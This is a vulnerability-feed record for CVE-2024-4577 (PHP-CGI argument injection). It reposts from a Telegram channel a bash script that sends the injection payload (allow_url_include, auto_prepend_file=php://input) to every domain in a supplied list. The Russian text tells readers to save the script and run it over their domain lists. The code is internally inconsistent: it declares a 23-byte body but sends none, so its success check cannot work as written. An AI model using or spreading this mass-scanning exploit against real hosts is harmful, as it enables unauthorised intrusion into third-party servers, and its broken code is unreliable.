{"uuid": "304d9ee9-c43d-4c64-80c5-dd8d51b48029", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2117", "content": "CVE-2024-4577 Argument Injection in PHP-CGI\n\u0414\u041e\u041f\u041e\u041b\u041d\u0415\u041d\u0418\u0415 \u043a \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u043c\u0443 \u043f\u043e\u0441\u0442\u0443\nBASH:\n#!/bin/bash\n\n# Function to check vulnerability for a domain\ncheck_vulnerability() {\n    local domain=$1\n    local response=$(curl -s -X POST \"${domain}/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input\" \\\n        -H \"User-Agent: curl/8.3.0\" \\\n        -H \"Accept: */*\" \\\n        -H \"Content-Length: 23\" \\\n        -H \"Content-Type: application/x-www-form-urlencoded\" \\\n        -H \"Connection: keep-alive\" \\\n        --data \"\" \\\n        --max-time 10)\n\n    if [[ $response == *\"PHP Version\"* ]]; then\n        echo \"$domain: Vulnerable\"\n    fi\n}\n\n# Main function to iterate over domains\nmain() {\n    local file=$1\n    while IFS= read -r domain || [ -n \"$domain\" ]; do\n        check_vulnerability \"$domain\"\n    done < \"$file\"\n}\n\n# Check if the file argument is provided\nif [ \"$#\" -ne 1 ]; then\n    echo \"Usage: $0 \"\n    exit 1\nfi\n\n# Call the main function with the domain list file\nmain \"$1\"\n\n*\n\u0421\u043e\u0445\u0440\u0430\u043d\u044f\u0439\u0442\u0435 \u0441\u043a\u0440\u0438\u043f\u0442 \u0438 \u043f\u043e \u0441\u043f\u0438\u0441\u043a\u0443 \u0434\u043e\u043c\u0435\u043d\u043e\u0432:\n./CVE-2024-4577_script.sh /path/to/domains-list\n\n#php #xamp", "creation_timestamp": "2024-06-07T18:33:10.000000Z"}